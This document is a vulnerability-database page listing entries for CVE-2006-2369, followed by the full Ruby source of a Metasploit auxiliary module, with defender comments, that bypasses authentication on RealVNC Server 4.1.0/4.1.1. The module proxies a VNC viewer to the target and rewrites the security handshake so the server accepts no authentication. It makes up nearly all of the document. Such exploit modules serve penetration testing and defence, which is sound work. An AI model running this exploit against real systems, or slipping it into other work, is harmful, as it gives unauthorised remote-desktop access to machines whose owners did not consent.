| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
| RealVNC Authentication Bypass | 26 Aug 2011 00:00 | – | zdt | |
| Exploit for Improper Authentication in Vnc Realvnc | 8 Mar 2026 08:00 | – | githubexploit | |
| CVE-2006-2369 | 26 Aug 2011 00:00 | – | circl | |
| RealVNC Password Authentication Bypass (CVE-2006-2369) | 25 May 2006 00:00 | – | checkpoint_advisories | |
| CVE-2006-2369 | 15 May 2006 16:00 | – | cve | |
| CVE-2006-2369 | 15 May 2006 16:00 | – | cvelist | |
| CVE-2006-2369 | 15 May 2006 16:00 | – | debiancve | |
| RealVNC - Authentication Bypass (Metasploit) | 26 Aug 2011 00:00 | – | exploitdb | |
| RealVNC 4.1.0/4.1.1 - Authentication Bypass | 13 May 2012 00:00 | – | exploitdb | |
| RealVNC 4.1.04.1.1 - Authentication Bypass | 13 May 2012 00:00 | – | exploitpack |
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
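# Auxiliary module for CVE-2006-2369 (RealVNC Server 4.1.0 / 4.1.1).
#
# The module sits between a local VNC viewer and the target server and
# rewrites the RFB 003.008 security-type negotiation: the viewer is told that
# only type 1 ("None") is offered, and the server is sent type 1 as the
# selected type regardless of the list it advertised. An affected server
# accepts a type it never offered, which is the root cause of the CVE.
#
# Defender notes: the fix is to run a server release newer than the affected
# 4.1.0/4.1.1 builds. On the wire, the tell-tale is an RFB 003.008 handshake
# in which the client's one-byte security-type choice is not among the types
# the server listed immediately before it.
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the RHOST/RPORT/LPORT/AUTOVNC options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    # The description text is kept flush-left: leading whitespace inside %q{}
    # would become part of the string.
    super(update_info(info,
      'Name' => 'RealVNC Authentication Bypass',
      'Description' => %q{
This module exploits an Authentication Bypass Vulnerability
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
listener on LPORT and proxies to the target server
The AUTOVNC option requires that vncviewer be installed on
the attacking machine. This option should be disabled for Pro
},
      'Author' =>
        [
          'hdm', # original msf2 module
          'TheLightCosine <thelightcosine[at]gmail.com>'
        ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 13641 $',
      'References' =>
        [
          ['BID', '17978'],
          ['OSVDB', '25479'],
          ['URL', 'http://secunia.com/advisories/20107/'],
          ['CVE', 'CVE-2006-2369'],
        ],
      'DisclosureDate' => 'May 15 2006'))

    register_options(
      [
        OptAddress.new('RHOST', [true, 'The Target Host']),
        OptPort.new('RPORT', [true, "The port the target VNC Server is listening on", 5900 ]),
        OptPort.new('LPORT', [true, "The port the local VNC Proxy should listen on", 5900 ]),
        OptBool.new('AUTOVNC', [true, "Automatically Launch vncviewer from this host", true])
      ], self.class)
  end

  # Accepts one viewer connection on LPORT, performs the rewritten security
  # handshake against RHOST:RPORT, then relays traffic until either side
  # closes.
  #
  # Every exit path (missing vncviewer, unexpected server banner, closed
  # connection, exception) goes through the ensure clause, so the listener,
  # both sockets and the viewer thread are always released. The original
  # never closed the listener and leaked it on the early returns.
  #
  # @return [nil]
  def run
    listener = nil
    client = nil
    s = nil
    view = nil

    print_status("starting listener")
    # NOTE(review): the proxy binds to every interface, so any host that can
    # reach LPORT is relayed into the session. Bind to 127.0.0.1 when the
    # viewer runs on this machine.
    listener = Rex::Socket::TcpServer.create(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => datastore['LPORT'],
      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
    )

    # With AUTOVNC set, a vncviewer pointed at the proxy listener is spawned
    # on the local machine.
    if datastore['AUTOVNC']
      unless check_vncviewer
        print_error("vncviewer does not appear to be installed, exiting!!!")
        return nil
      end
      print_status("Spawning viewer thread")
      view = framework.threads.spawn("VncViewerWrapper", false) {
        # to_i keeps the value interpolated into the shell command numeric.
        system("vncviewer 127.0.0.1::#{datastore['LPORT'].to_i}")
      }
    end

    # Connect the viewer side and the server side of the proxy.
    client = listener.accept
    add_socket(client)
    s = Rex::Socket::Tcp.create(
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => datastore['RPORT'],
      'Timeout' => 1
    )
    add_socket(s)

    # gets returns nil when the server closes before sending a banner; treat
    # that like any other non-matching banner instead of raising.
    serverhello = s.gets
    unless serverhello && serverhello.include?("RFB 003.008")
      print_error("The VNCServer is not vulnerable")
      return
    end

    # Version exchange is passed through unchanged.
    client.puts(serverhello)
    clienthello = client.gets
    unless clienthello
      print_error("Client Closed Connection")
      return
    end
    s.puts(clienthello)

    # Security-type negotiation: the server's two-byte list is read and
    # dropped, and the viewer is shown a one-entry list holding type 1.
    s.recv(2)
    print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
    client.write("\x01\x01")
    client.recv(1)
    s.write("\x01")
    # NOTE(review): the server's four-byte reply is discarded, so a refusal
    # from a fixed server is not reported before the viewer is sent a
    # zero (success) result.
    s.recv(4)
    client.write("\x00\x00\x00\x00")

    # Relay the rest of the session. A non-zero select timeout lets the loop
    # sleep while idle; the original passed 0 and spun the CPU.
    sockets = [client, s]
    loop do
      ready = select(sockets, nil, nil, 0.5)
      next if ready.nil?

      readable = ready[0]
      break if readable.include?(client) && !forward(client, s, "Client Closed Connection")
      break if readable.include?(s) && !forward(s, client, "Server Closed Connection")
    end
  ensure
    close_quietly(s)
    close_quietly(client)
    close_quietly(listener)
    print_status("Listener Closed")
    if view
      view.kill
      print_status("Viewer Closed")
    end
  end

  # Reports whether a vncviewer binary can be found on the search path.
  #
  # @return [Boolean] true when 'vncviewer' or 'vncviewer.exe' resolves
  def check_vncviewer
    vnc =
      Rex::FileUtils::find_full_path('vncviewer') ||
      Rex::FileUtils::find_full_path('vncviewer.exe')
    vnc ? true : false
  end

  private

  # Copies one chunk (up to 8192 bytes) from one socket to the other.
  #
  # @param from [#sysread] socket that select reported as readable
  # @param to [#write] socket receiving the data
  # @param closed_message [String] error printed when this direction ends
  # @return [Boolean] false when the read or the write failed, true otherwise
  def forward(from, to, closed_message)
    data = from.sysread(8192)
    if data.nil?
      print_error(closed_message)
      return false
    end
    to.write(data)
    true
  rescue ::StandardError
    # sysread raises at end of stream; any failure ends the relay.
    print_error(closed_message)
    false
  end

  # Closes a socket during cleanup without letting a failed close stop the
  # remaining cleanup steps.
  #
  # @param sock [#close, nil] socket to release; nil is ignored
  def close_quietly(sock)
    sock.close if sock
  rescue ::IOError, ::SystemCallError
    # Already closed or torn down by the peer; nothing left to release.
  end
end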